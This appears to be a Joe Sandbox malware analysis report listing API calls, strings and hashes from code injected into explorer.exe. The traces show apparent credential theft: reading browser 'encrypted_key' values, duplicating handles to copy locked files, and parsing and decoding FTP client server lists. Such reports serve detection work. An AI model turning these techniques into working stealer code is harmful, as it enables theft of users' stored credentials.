                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$lstrcat
                                                                        • String ID: "encrypted_key":"
                                                                        • API String ID: 493641738-877455259
                                                                        • Opcode ID: 0e7962468f37f4cd111f0334417c979694be83d130f8aab564162d1a315eca46
                                                                        • Instruction ID: fe260829b579ca5ac4c23c345acba5e98a22bd74172437c864f01d7b1c3025c5
                                                                        • Opcode Fuzzy Hash: 0e7962468f37f4cd111f0334417c979694be83d130f8aab564162d1a315eca46
                                                                        • Instruction Fuzzy Hash: 47E09B627357669F8361FBB92C48847BF58AE4741130D4068E541D7202DEE19442D2A5
                                                                        Function 0327BAFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,?,readonly_shm,00000000,00000000,?,?,?), ref: 0327BB40
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID: winDelete
                                                                        • API String ID: 3188754299-3936022152
                                                                        • Opcode ID: 4db75bcfd7f2724feb7cdf9f0218ecce280dafbc88f30cb5b489599e5ab2a3e6
                                                                        • Instruction ID: 1b8f23e9b7425ef82896fd3432d54704b2b36dfc850cd9a4a56a67ac24811a6f
                                                                        • Opcode Fuzzy Hash: 4db75bcfd7f2724feb7cdf9f0218ecce280dafbc88f30cb5b489599e5ab2a3e6
                                                                        • Instruction Fuzzy Hash: 86114834A20209EBDB10EB649849C7D7779FF81720F149155EC02D7288DB7099918782
                                                                        Function 03272EA5 Relevance: 4.5, APIs: 3, Instructions: 43registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 03271011: GetProcessHeap.KERNEL32(00000000,00000000,?,03271A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2), ref: 03271020
                                                                          • Part of subcall function 03271011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2,PortNumber,00000000,00000000), ref: 03271027
                                                                          • Part of subcall function 03271000: GetProcessHeap.KERNEL32(00000008,?,032711C7,?,?,00000001,00000000,?), ref: 03271003
                                                                          • Part of subcall function 03271000: RtlAllocateHeap.NTDLL(00000000), ref: 0327100A
                                                                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 03272EE4
                                                                        • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 03272F54
                                                                        • RegCloseKey.KERNELBASE(?), ref: 03272F62
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$Process$AllocateCloseEnumFreeOpen
                                                                        • String ID:
                                                                        • API String ID: 1066184869-0
                                                                        • Opcode ID: 921c51bfb5babf5460d567cda171ec4271d218b0679499a92e54e8fb67a9d8bd
                                                                        • Instruction ID: 2a6b667f01f470db5637c7ee6a48a8720c208c6bdde142e72741d818db36ae54
                                                                        • Opcode Fuzzy Hash: 921c51bfb5babf5460d567cda171ec4271d218b0679499a92e54e8fb67a9d8bd
                                                                        • Instruction Fuzzy Hash: A601A235224351ABC715EF22DC08E6FBBA9FFC4350F04442DF80996144DB759895EBE2
                                                                        Function 03274B72 Relevance: 4.5, APIs: 3, Instructions: 8COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: ExitInitializeProcessUninitialize
                                                                        • String ID:
                                                                        • API String ID: 4175140541-0
                                                                        • Opcode ID: a4e24f65892e73e846c38c19616a9fa5b55211c02cd9dbcd40c616fdc44ad8b9
                                                                        • Instruction ID: 09a59f9544eca0982e2177d143b7edf0e1a671b9a0f89571011bf17bcc64415c
                                                                        • Opcode Fuzzy Hash: a4e24f65892e73e846c38c19616a9fa5b55211c02cd9dbcd40c616fdc44ad8b9
                                                                        • Instruction Fuzzy Hash: 7BC04C362642014BE7807BF27C0E7093518BF05B13F089000E20589084DAA454408623
                                                                        Function 03279FC8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 03279FF8
                                                                        Strings
                                                                        • failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 0327A00E
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CreateHeap
                                                                        • String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
                                                                        • API String ID: 10892065-982776804
                                                                        • Opcode ID: 677e9f62cbd4d403beba607afba640656ae1fdcd413c08f147ab79f1a8a20c17
                                                                        • Instruction ID: e29b249320cff353ff353de90465632d0075863b19ec57e7f61e61c21377bf74
                                                                        • Opcode Fuzzy Hash: 677e9f62cbd4d403beba607afba640656ae1fdcd413c08f147ab79f1a8a20c17
                                                                        • Instruction Fuzzy Hash: 84F02B73B34342BEE730EA98AC88F3B679CF785795F144819F94596284E3B06CC18671
                                                                        Function 03271AFE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 03271000: GetProcessHeap.KERNEL32(00000008,?,032711C7,?,?,00000001,00000000,?), ref: 03271003
                                                                          • Part of subcall function 03271000: RtlAllocateHeap.NTDLL(00000000), ref: 0327100A
                                                                        • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,03272E83,PathToExe,00000000,00000000), ref: 03271B16
                                                                          • Part of subcall function 03271011: GetProcessHeap.KERNEL32(00000000,00000000,?,03271A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2), ref: 03271020
                                                                          • Part of subcall function 03271011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2,PortNumber,00000000,00000000), ref: 03271027
                                                                          • Part of subcall function 032719E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2,PortNumber,00000000,00000000), ref: 03271A1E
                                                                          • Part of subcall function 032719E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 03271A3C
                                                                          • Part of subcall function 032719E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 03271A75
                                                                          • Part of subcall function 032719E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2,PortNumber,00000000,00000000), ref: 03271A98
                                                                        Strings
                                                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 03271B40
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                        • API String ID: 2162223993-2036018995
                                                                        • Opcode ID: e02642219ab48ffe4846f17a62e2cadfa5e79583690850645f13b013bb06cd55
                                                                        • Instruction ID: bdf56807533405343b55b62f8a88578834f8f09d3e22a2a283e399c83cbc2fbf
                                                                        • Opcode Fuzzy Hash: e02642219ab48ffe4846f17a62e2cadfa5e79583690850645f13b013bb06cd55
                                                                        • Instruction Fuzzy Hash: 34F0242772064827C220B96BDC88E6B364EEFC12A631A0029F81987241EE327CA15270
                                                                        Function 0327A33B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 0327A35F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: FilePointer
                                                                        • String ID: winSeekFile
                                                                        • API String ID: 973152223-3168307952
                                                                        • Opcode ID: 49a911f73ac9d2febf5d8427f609447f2074500d641581e925abd0ca5c6b6d3f
                                                                        • Instruction ID: 0eed61a56b8424301c0dab1b64ab01bfb80d513caa7f175e77789d7035acb744
                                                                        • Opcode Fuzzy Hash: 49a911f73ac9d2febf5d8427f609447f2074500d641581e925abd0ca5c6b6d3f
                                                                        • Instruction Fuzzy Hash: E3F09030A25204AFE711DE64EC049BA77A9FB45331B14C36ABC61CA7C4DA70DD509AA1
                                                                        Function 03279EA7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(05450000,00000000,?), ref: 03279EB5
                                                                        Strings
                                                                        • failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 03279ECD
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
                                                                        • API String ID: 1279760036-667713680
                                                                        • Opcode ID: f389671102a8b91a377049ae74157a00d607c2e3aaa63dbf43084ed5d5ea5874
                                                                        • Instruction ID: 071051701148c7a19d1336a7b2877cd9b0b2c3b8ce35f8be2ec3c62d8bb94370
                                                                        • Opcode Fuzzy Hash: f389671102a8b91a377049ae74157a00d607c2e3aaa63dbf43084ed5d5ea5874
                                                                        • Instruction Fuzzy Hash: 46E0C237A14311BFC2127688BC08F2FB768EB84F10F058015FA00A6A09C670A8A2D7E2
                                                                        Function 03279EE8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(05450000,00000000,?), ref: 03279EF8
                                                                        Strings
                                                                        • failed to HeapFree block %p (%lu), heap=%p, xrefs: 03279F0E
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID: failed to HeapFree block %p (%lu), heap=%p
                                                                        • API String ID: 3298025750-4030396798
                                                                        • Opcode ID: d4c4e5c926c5b6e6b8158d1b4de09da8c6fd9bd9f530b13b1dc24668e3bc4a0a
                                                                        • Instruction ID: 955a3b5a1fb410f59ea125603da25759e7915edd1fec5c82d9c1613194d6b2e5
                                                                        • Opcode Fuzzy Hash: d4c4e5c926c5b6e6b8158d1b4de09da8c6fd9bd9f530b13b1dc24668e3bc4a0a
                                                                        • Instruction Fuzzy Hash: D6D01277658302BBD241AA54BC09F3B777DAB95A00F494419F11495459D37060E2AF62
                                                                        Function 03271B6A Relevance: 3.0, APIs: 2, Instructions: 25fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,03272893,00000000,00000000,00000000,?), ref: 03271B82
                                                                        • CloseHandle.KERNELBASE(00000000), ref: 03271B8F
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateFileHandle
                                                                        • String ID:
                                                                        • API String ID: 3498533004-0
                                                                        • Opcode ID: 549a3bc1980c17d3d36cec6403388f12fdcefb07ea9fa269e247cf36deff729f
                                                                        • Instruction ID: 57d122b060ac359d54c159a82bea10acf51e56e94b89e14b6a0703deac254039
                                                                        • Opcode Fuzzy Hash: 549a3bc1980c17d3d36cec6403388f12fdcefb07ea9fa269e247cf36deff729f
                                                                        • Instruction Fuzzy Hash: 53D01771263631A2E5B5A6357C0CFA7AE1CFF02AB5B0C4614B41DE54C8E22498D782E0
                                                                        Function 03271011 Relevance: 3.0, APIs: 2, Instructions: 12memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 03271162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0327116F
                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,03271A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2), ref: 03271020
                                                                        • RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2,PortNumber,00000000,00000000), ref: 03271027
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$FreeProcessQueryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2580854192-0
                                                                        • Opcode ID: af7b2b191bae4483a7f21cad41e372cf28882eb2caa5cc89cdd4cada5bfa4f80
                                                                        • Instruction ID: c50f78a474d2611c15c8432f0c3e3a12f4c101f2a12da5397f7e5f0c59d93afe
                                                                        • Opcode Fuzzy Hash: af7b2b191bae4483a7f21cad41e372cf28882eb2caa5cc89cdd4cada5bfa4f80
                                                                        • Instruction Fuzzy Hash: D3C08C3202022052C96077A1380CBDB2B08EF09923F080081B8419B245CAF1888082A0
                                                                        Function 03271000 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetProcessHeap.KERNEL32(00000008,?,032711C7,?,?,00000001,00000000,?), ref: 03271003
                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0327100A
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$AllocateProcess
                                                                        • String ID:
                                                                        • API String ID: 1357844191-0
                                                                        • Opcode ID: 5b4a5855429f69d9419aece50287c22d9adba39d55f283791fb1c2c4bb251b24
                                                                        • Instruction ID: dadd0eadbba971dd463aea72c56548e869fba0f7df1880da9b4e34beee106dfd
                                                                        • Opcode Fuzzy Hash: 5b4a5855429f69d9419aece50287c22d9adba39d55f283791fb1c2c4bb251b24
                                                                        • Instruction Fuzzy Hash: 50A002B55601045FDD4477A5BA0DB1A3518FB44B03F148544718586545D9E454048721
                                                                        Function 032712A3 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlZeroMemory.NTDLL(?,00000018), ref: 032712B5
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryZero
                                                                        • String ID:
                                                                        • API String ID: 816449071-0
                                                                        • Opcode ID: f81b90fdcace0c9ffadd1b35ccb4bbe5686508042d77122d1000604c783c8b62
                                                                        • Instruction ID: 0bf87586162aa5538aa3651236daffd90017ac464a0e5afc7f8e1facb804f733
                                                                        • Opcode Fuzzy Hash: f81b90fdcace0c9ffadd1b35ccb4bbe5686508042d77122d1000604c783c8b62
                                                                        • Instruction Fuzzy Hash: E6110AB1A11209AFDB10EFA5E988ABEB7BCFF08641B144029F945E3240D770DA44CB60
                                                                        Function 03271B9D Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(00000000,00000000,03272C8F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 03271BAA
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: 278a69b8b08c0b13b906bc614435da82d2509883fe5677a734bfdf94904b38ec
                                                                        • Instruction ID: 7f5cf9317dfcb2a75427b07664c49f065f6e23bd21851fac4a1ff04fa6313c36
                                                                        • Opcode Fuzzy Hash: 278a69b8b08c0b13b906bc614435da82d2509883fe5677a734bfdf94904b38ec
                                                                        • Instruction Fuzzy Hash: A3D0A933E23432828A74AA38380C8A2E2807E8057431E03B4FC26F34C4E234ECE342C0
                                                                        Function 03271677 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 03271684
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CreateGlobalStream
                                                                        • String ID:
                                                                        • API String ID: 2244384528-0
                                                                        • Opcode ID: c375d3b49bf918237ad69a5ebbe4f11bc1110763d862aef70968700663ff2165
                                                                        • Instruction ID: 43cfd37ab0ba4d9394f8cf64ccb33531d6912bc788ee5607d52a1febc48b4ac9
                                                                        • Opcode Fuzzy Hash: c375d3b49bf918237ad69a5ebbe4f11bc1110763d862aef70968700663ff2165
                                                                        • Instruction Fuzzy Hash: 4AC08C31130232DFE7302A309C0AB8636D8EF09BB2F0A0969E0C19D0C0E2F848C0CA91
                                                                        Function 0327104C Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,0327158A), ref: 03271056
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 78cf39cee7a927a49b00abc06f82b703b7552ee1cb7f7ad0b4b98f1beeb957f1
                                                                        • Instruction ID: efc7df3bf6ff48d1ce52bb8983561edacefb7cd83123f7a037e23bc5c900dbe5
                                                                        • Opcode Fuzzy Hash: 78cf39cee7a927a49b00abc06f82b703b7552ee1cb7f7ad0b4b98f1beeb957f1
                                                                        • Instruction Fuzzy Hash: FFA002F07E57007AFD696762BE1FF152938AB40F02F144244B30D7C0C456E47500852D
                                                                        Function 0327105D Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,03274A5B,?,?,00000000,?,?,?,?,03274B66,?), ref: 03271065
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: FreeVirtual
                                                                        • String ID:
                                                                        • API String ID: 1263568516-0
                                                                        • Opcode ID: ba4c09fdc16772d866da8f97fdf609cede259a87ea2540edf869abf1bdb46970
                                                                        • Instruction ID: a8ecf31187cf5d29a0bc4dabe51ca7399f6794964c3e5c7ae7099c2d517ffbc6
                                                                        • Opcode Fuzzy Hash: ba4c09fdc16772d866da8f97fdf609cede259a87ea2540edf869abf1bdb46970
                                                                        • Instruction Fuzzy Hash: 18A002706A070066EDB467206D0EF1526146740F02F2485447281A95C549E5E0448A18

                                                                        Non-executed Functions

                                                                        Function 0327349B Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 201nativefilestringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000), ref: 032734C0
                                                                          • Part of subcall function 032733C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 03273401
                                                                        • OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,032737A8), ref: 032734E9
                                                                          • Part of subcall function 03271000: GetProcessHeap.KERNEL32(00000008,?,032711C7,?,?,00000001,00000000,?), ref: 03271003
                                                                          • Part of subcall function 03271000: RtlAllocateHeap.NTDLL(00000000), ref: 0327100A
                                                                        • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 0327351E
                                                                        • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 03273541
                                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 03273586
                                                                        • DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 0327358F
                                                                        • lstrcmpiW.KERNEL32(00000000,File), ref: 032735B6
                                                                        • NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 032735DE
                                                                        • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 032735F6
                                                                        • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 03273606
                                                                        • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0327361E
                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 03273631
                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 03273658
                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0327366B
                                                                        • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 03273681
                                                                        • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 032736AD
                                                                        • CloseHandle.KERNEL32(?), ref: 032736C0
                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,032737A8), ref: 032736F5
                                                                          • Part of subcall function 03271C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 03271CC0
                                                                          • Part of subcall function 03271C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 03271CDA
                                                                          • Part of subcall function 03271C9F: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 03271CE6
                                                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,032737A8), ref: 03273707
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
                                                                        • String ID: File
                                                                        • API String ID: 3915112439-749574446
                                                                        • Opcode ID: 86d6615e1eb20a87852620128a46e3379c663da3c967ac8a0364c56f1b200673
                                                                        • Instruction ID: aff085d8b72e9192dffa2d240bb8561b47222161fea0acdef46a9c6bd1cdcd32
                                                                        • Opcode Fuzzy Hash: 86d6615e1eb20a87852620128a46e3379c663da3c967ac8a0364c56f1b200673
                                                                        • Instruction Fuzzy Hash: B061B475224301AFD720EF21DC48F2BBBE9FF88751F18052CFA8696290D775D8849B95
                                                                        Function 032C4438 Relevance: 19.9, APIs: 3, Strings: 10, Instructions: 359COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memcmp.NTDLL(localhost,00000007,00000009,00000002,?,00000000,000001D8,?,00000000), ref: 032C4502
                                                                        • memcmp.NTDLL(00000000,?,?,00000002,?,00000000,000001D8,?,00000000), ref: 032C475F
                                                                        • memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 032C4803
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: memcmp$memcpy
                                                                        • String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
                                                                        • API String ID: 231171946-1096842476
                                                                        • Opcode ID: 5e5fbcbb945ea50f790540c81bc3d58fde5bde4b4c1a5bc8dec47d91deacb8dc
                                                                        • Instruction ID: 113befc179b1478875270d2f65189307927c70243dc60b27fec812e5411619d0
                                                                        • Opcode Fuzzy Hash: 5e5fbcbb945ea50f790540c81bc3d58fde5bde4b4c1a5bc8dec47d91deacb8dc
                                                                        • Instruction Fuzzy Hash: BDC14570A383C38BDB36EE1A846077BB7E5AF85214F18075EE8D587246C774D4C98B42
                                                                        Function 03295F08 Relevance: 12.3, APIs: 1, Strings: 7, Instructions: 328COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 03276AAA: memset.NTDLL ref: 03276AC5
                                                                        • memset.NTDLL ref: 03295F53
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: memset
                                                                        • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
                                                                        • API String ID: 2221118986-594550510
                                                                        • Opcode ID: 73204687cc2c7e8e66a49aad4a7d13bb927b0498fe8bd5c9aab1c34e1cac019d
                                                                        • Instruction ID: bde89ac149a6ee279f0b06fc38fe6dd5cd4aa5d65e8893aa70e25efad6f04b50
                                                                        • Opcode Fuzzy Hash: 73204687cc2c7e8e66a49aad4a7d13bb927b0498fe8bd5c9aab1c34e1cac019d
                                                                        • Instruction Fuzzy Hash: 07C1A174A247429FDB14DF24C480A2EF7E2BF88710F14892EF8549B241D775D996CB92
                                                                        Function 03274440 Relevance: 38.8, APIs: 12, Strings: 10, Instructions: 289stringcommemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CoCreateInstance.COMBASE(032C62B0,00000000,00000001,032C62A0,?), ref: 0327445F
                                                                        • SysAllocString.OLEAUT32(?), ref: 032744AA
                                                                        • lstrcmpiW.KERNEL32(RecentServers,?), ref: 0327456E
                                                                        • lstrcmpiW.KERNEL32(Servers,?), ref: 0327457D
                                                                        • lstrcmpiW.KERNEL32(Settings,?), ref: 0327458C
                                                                          • Part of subcall function 032711E1: lstrlenW.KERNEL32(?,7591F360,00000000,?,00000000,?,032746E3), ref: 032711ED
                                                                          • Part of subcall function 032711E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0327120F
                                                                          • Part of subcall function 032711E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 03271231
                                                                        • lstrcmpiW.KERNEL32(Server,?), ref: 032745BE
